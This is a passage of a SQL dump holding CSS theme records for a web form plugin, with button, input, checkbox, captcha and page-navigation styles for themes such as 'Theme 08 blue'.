line-height: 35px;\r\n	background: #930049;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #EEEEEE;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #930049;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break \r\n{\r\n	color: #930049;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 0px solid #fff;\r\ncolor: #414141;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type=\"text\"]:focus {\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus {\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #636363;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: \"\";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/08/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8A8A8A;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8A8A8A;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #CDCDCD;\r\nbackground-color: #F8F8F8;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-right:3px;\r\nmargin-bottom:3px;\r\nfont-weight: bold;\r\n}\r\n.page_active {\r\n	color: #930049;\r\ncursor: pointer;\r\nbackground-color: #fff;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #EEEEEE;\r\nfont-weight: bold;\r\nmargin-right:3px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 1px;\r\nborder-spacing: 0px;\r\nheight: 21px;\r\nline-height: 20px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nbackground: #930049;\r\n}\r\n.page_percentage_deactive {\r\n	height: 24px;\r\nline-height: 20px;\r\nbackground-color: #FFFFFF;\r\ntext-align: left !important;\r\nmargin: 0 5px;\r\nborder: 1px solid #EEEEEE;\r\ndisplay: inline-block;\r\nwidth: 98%;\r\nborder-bottom: none;\r\n\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -1px;\r\n}\r\n\r\n.wdform_percentage_text {\r\n	color: #fff;\r\n	font-weight: bold;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(30,'Theme 08 blue','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #070068;\r\nmargin-bottom: 10px;\r\ncolor: #070068;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\na.ui-spinner-button\r\n{\r\nbackground:none !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #414141;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #070068 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 1px solid #EEEEEE !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/08/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/08/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/08/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #070068;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #070068;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break \r\n{\r\n	color: #070068;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 0px solid #fff;\r\ncolor: #414141;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type=\"text\"]:focus {\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus {\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #636363;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: \"\";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/08/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #8A8A8A;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #8A8A8A;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #CDCDCD;\r\nbackground-color: #F8F8F8;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-right:3px;\r\nmargin-bottom:3px;\r\nfont-weight: bold;\r\n}\r\n.page_active {\r\n	color: #070068;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #EEEEEE;\r\nfont-weight: bold;\r\nmargin-right:3px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 1px;\r\nborder-spacing: 0px;\r\nheight: 21px;\r\nline-height: 20px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nbackground: #070068;\r\n}\r\n.page_percentage_deactive {\r\n	height: 24px;\r\nline-height: 20px;\r\nbackground-color: #FFFFFF;\r\ntext-align: left !important;\r\nmargin: 0 5px;\r\nborder: 1px solid #EEEEEE;\r\ndisplay: inline-block;\r\nwidth: 98%;\r\nborder-bottom: none;\r\n\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -1px;\r\n}\r\n\r\n.wdform_percentage_text {\r\n	color: #fff;\r\n	font-weight: bold;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(31,'Theme 09 light gray','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #DDDDDD;\r\nborder: 1px solid #818181;\r\nmargin-bottom: 10px;\r\ncolor: #818181;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	